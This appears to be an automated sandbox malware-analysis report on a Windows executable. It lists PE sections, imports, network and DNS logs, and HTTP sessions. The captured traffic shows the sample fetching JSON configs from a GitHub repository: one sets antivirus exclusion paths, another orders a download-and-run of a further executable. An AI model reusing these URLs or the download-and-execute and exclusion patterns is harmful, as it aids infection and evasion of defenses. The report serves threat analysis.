                          /320x62a0000x16c1a0x16e00c17bbd59138a10ec4186e17c87425621False0.9933081454918032data7.937326684040818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /460x6410000x300x20040cca7c46fc713b4f088e5d440ca7931False0.103515625data0.8556848540171443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /650x6420000xea7cc0xea800a4000ac04b05d989659ba037b4fa34beFalse0.9992535231210021data7.997931431657807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /780x72d0000x8a93a0x8aa009ccb7bb4cfa87302129d071093acc5b2False0.9908877648782687data7.9948832902156095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /900x7b80000x29a990x29c00614b9fab6634f0ffa526654d2f4e5716False0.9623058570359282data7.822178478313296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .idata0x7e20000x5540x60048061013b3c118f7e82018a0486c6049False0.3828125data4.060039263158338IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .reloc0x7e30000xb0140xb200ebf5eede3a8c398bf8d59cde80bcadd8False0.26264044943820225data5.430341682252091IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .symtab0x7ef0000x5b6ff0x5b8007657e321956daf9b5ef7532d4d28cbdcFalse0.22409441171448088data5.288123149705255IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          DLLImport
                          kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler
                          TimestampSource PortDest PortSource IPDest IP
                          Aug 27, 2024 12:55:06.375881910 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.375935078 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:06.376003027 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.377064943 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.377087116 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:06.845598936 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:06.845900059 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.845926046 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:06.846014023 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.846019983 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:06.847343922 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:06.847429991 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.896635056 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.896748066 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.896796942 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:06.944397926 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:06.944408894 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:06.992136955 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.092953920 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.093051910 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.093121052 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.093508959 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.093508959 CEST49730443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.093530893 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.093540907 CEST44349730185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.094810963 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.094851017 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.094928026 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.095293999 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.095309019 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.567802906 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.568198919 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.568217039 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.568386078 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.568394899 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.569572926 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.569655895 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.588798046 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.588923931 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.588948965 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.634057045 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.634078979 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.680604935 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.696872950 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.696984053 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.697047949 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.702719927 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.702745914 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:07.702759027 CEST49731443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:07.702764988 CEST44349731185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:34.070128918 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.070161104 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.070244074 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.071428061 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.071438074 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.718813896 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.719011068 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.719019890 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.719160080 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.719163895 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.720109940 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.720172882 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.742631912 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.742712975 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.742752075 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.784503937 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.789899111 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:34.789912939 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:34.837568998 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:35.146241903 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:35.146342039 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:35.146404028 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:35.146406889 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:35.146456957 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:35.146728992 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:35.146747112 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:35.146768093 CEST49738443192.168.2.4140.82.121.3
                          Aug 27, 2024 12:55:35.146773100 CEST44349738140.82.121.3192.168.2.4
                          Aug 27, 2024 12:55:35.148200035 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.148251057 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.148325920 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.148596048 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.148614883 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.600306988 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.600625992 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.600661039 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.600824118 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.600831032 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.601861000 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.601938009 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.603209019 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.603279114 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.603363037 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.603379011 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.651518106 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.990891933 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.990961075 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.990984917 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991008997 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991034031 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991065979 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991099119 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991110086 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.991127014 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991137981 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991173029 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.991192102 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991220951 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991236925 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.991250992 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.991291046 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.991300106 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995649099 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995683908 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995718956 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.995748997 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995786905 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995819092 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.995831013 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.995870113 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.996109962 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.996180058 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.996206045 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.996233940 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.996247053 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.996304035 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.997010946 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.997075081 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.997106075 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.997122049 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.997139931 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.997185946 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.997977972 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998039961 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998069048 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998095036 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998111963 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998161077 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998167992 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998182058 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998224974 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998289108 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998303890 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:35.998326063 CEST49739443192.168.2.4185.199.109.133
                          Aug 27, 2024 12:55:35.998331070 CEST44349739185.199.109.133192.168.2.4
                          Aug 27, 2024 12:55:38.198266983 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.198319912 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.198400974 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.205292940 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.205307961 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.867611885 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.867721081 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.871855974 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:38.871869087 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.872183084 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:38.926866055 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.497292995 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.497356892 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.497380972 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.725958109 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.725977898 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.726032019 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.726047039 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.726098061 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.728382111 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.728399992 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:39.728415012 CEST49740443192.168.2.445.125.66.18
                          Aug 27, 2024 12:55:39.728420973 CEST4434974045.125.66.18192.168.2.4
                          Aug 27, 2024 12:55:42.414951086 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:42.414990902 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:42.415065050 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:42.415326118 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:42.415343046 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.096940041 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.097238064 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.097270012 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.097528934 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.097537041 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.098613977 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.098684072 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.099627972 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.099713087 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.099716902 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.144505024 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.147093058 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.147104979 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.194972038 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.209078074 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.209161997 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.209330082 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.209466934 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.209491014 CEST4434974134.194.69.213192.168.2.4
                          Aug 27, 2024 12:55:43.209501982 CEST49741443192.168.2.434.194.69.213
                          Aug 27, 2024 12:55:43.209506989 CEST4434974134.194.69.213192.168.2.4
                          TimestampSource PortDest PortSource IPDest IP
                          Aug 27, 2024 12:55:06.365214109 CEST5728453192.168.2.41.1.1.1
                          Aug 27, 2024 12:55:06.372332096 CEST53572841.1.1.1192.168.2.4
                          Aug 27, 2024 12:55:34.057627916 CEST6162153192.168.2.41.1.1.1
                          Aug 27, 2024 12:55:34.069144964 CEST53616211.1.1.1192.168.2.4
                          Aug 27, 2024 12:55:42.405945063 CEST5504953192.168.2.41.1.1.1
                          Aug 27, 2024 12:55:42.414222002 CEST53550491.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Aug 27, 2024 12:55:06.365214109 CEST192.168.2.41.1.1.10x417cStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                          Aug 27, 2024 12:55:34.057627916 CEST192.168.2.41.1.1.10xd9c0Standard query (0)github.comA (IP address)IN (0x0001)false
                          Aug 27, 2024 12:55:42.405945063 CEST192.168.2.41.1.1.10x24e5Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Aug 27, 2024 12:55:06.372332096 CEST1.1.1.1192.168.2.40x417cNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                          Aug 27, 2024 12:55:06.372332096 CEST1.1.1.1192.168.2.40x417cNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                          Aug 27, 2024 12:55:06.372332096 CEST1.1.1.1192.168.2.40x417cNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                          Aug 27, 2024 12:55:06.372332096 CEST1.1.1.1192.168.2.40x417cNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                          Aug 27, 2024 12:55:34.069144964 CEST1.1.1.1192.168.2.40xd9c0No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                          Aug 27, 2024 12:55:42.414222002 CEST1.1.1.1192.168.2.40x24e5No error (0)httpbin.org34.194.69.213A (IP address)IN (0x0001)false
                          Aug 27, 2024 12:55:42.414222002 CEST1.1.1.1192.168.2.40x24e5No error (0)httpbin.org3.211.178.193A (IP address)IN (0x0001)false
                          • raw.githubusercontent.com
                          • github.com
                          • https:
                          • 45.125.66.18
                          • httpbin.org
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449730185.199.109.1334436120C:\Users\user\Desktop\1feP5qTCl0.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 10:55:06 UTC140OUTGET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1
                          Host: raw.githubusercontent.com
                          User-Agent: Go-http-client/1.1
                          Accept-Encoding: gzip
                          2024-08-27 10:55:07 UTC898INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 254
                          Cache-Control: max-age=300
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Content-Type: text/plain; charset=utf-8
                          ETag: "2b7d5e7976210b6b6243eb731562fda7633790a0d3e8fe06e97c427ca3df3b40"
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          X-GitHub-Request-Id: C138:B7845:695157:749E29:66CDB080
                          Accept-Ranges: bytes
                          Date: Tue, 27 Aug 2024 10:55:07 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr-kewr1740041-EWR
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1724756107.962493,VS0,VE85
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: d39b10111035c8908acbe8569ca00bf09d26751f
                          Expires: Tue, 27 Aug 2024 11:00:07 GMT
                          Source-Age: 0
                          2024-08-27 10:55:07 UTC254INData Raw: 7b 0d 0a 20 20 22 66 6f 6c 64 65 72 5f 70 61 74 68 22 3a 20 22 43 3a 5c 5c 52 65 6b 61 22 2c 0d 0a 20 20 22 61 64 64 5f 65 78 63 6c 75 73 69 6f 6e 73 22 3a 20 74 72 75 65 2c 0d 0a 20 20 22 65 78 63 6c 75 73 69 6f 6e 5f 70 61 74 68 73 22 3a 20 5b 0d 0a 20 20 20 20 22 43 3a 5c 5c 55 73 65 72 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 52 65 63 6f 76 65 72 79 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 52 65 6b 61 22 2c 0d 0a 20 20 20 20 22 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 5c 44 65 73 6b 74 6f 70 22 0d 0a 20 20 5d 0d 0a 7d
                          Data Ascii: { "folder_path": "C:\\Reka", "add_exclusions": true, "exclusion_paths": [ "C:\\Users", "C:\\Windows", "C:\\Program Files", "C:\\Program Files (x86)", "C:\\Recovery", "C:\\Reka", "%USERPROFILE%\\Desktop" ]}


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449731185.199.109.1334436120C:\Users\user\Desktop\1feP5qTCl0.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 10:55:07 UTC141OUTGET /workhasf/kelm/main/nepipirusas.json HTTP/1.1
                          Host: raw.githubusercontent.com
                          User-Agent: Go-http-client/1.1
                          Accept-Encoding: gzip
                          2024-08-27 10:55:07 UTC899INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 271
                          Cache-Control: max-age=300
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Content-Type: text/plain; charset=utf-8
                          ETag: "8afdee626e191786c845a423ef408c35314075f4a1c4350f44a55f7503d99b00"
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          X-GitHub-Request-Id: F629:28EE07:6F5FBC:7AAC5E:66CDB08B
                          Accept-Ranges: bytes
                          Date: Tue, 27 Aug 2024 10:55:07 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr-kewr1740033-EWR
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1724756108.638641,VS0,VE13
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: ef55b381375abf973199a51bf520f32b818a71ee
                          Expires: Tue, 27 Aug 2024 11:00:07 GMT
                          Source-Age: 0
                          2024-08-27 10:55:07 UTC271INData Raw: 7b 0d 0a 20 20 22 64 6f 77 6e 6c 6f 61 64 73 22 3a 20 5b 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 22 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 77 6f 72 6b 68 61 73 66 2f 6b 65 6c 6d 2f 72 61 77 2f 6d 61 69 6e 2f 69 63 6f 6e 6f 7a 61 76 65 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 20 22 72 61 70 6e 65 77 73 61 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 72 75 6e 22 3a 20 74 72 75 65 0d 0a 20 20 20 20 7d 2c 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 22 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 22 3a 20 22 22 2c 0d 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 20 22 64 6c 6c 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 72 75 6e 22 3a 20 66 61 6c 73
                          Data Ascii: { "downloads": [ { "download_url": "https://github.com/workhasf/kelm/raw/main/iconozave.exe", "file_name": "rapnewsa.exe", "run": true }, { "download_url": "", "file_name": "dll.exe", "run": fals


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.449738140.82.121.34436120C:\Users\user\Desktop\1feP5qTCl0.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 10:55:34 UTC127OUTGET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1
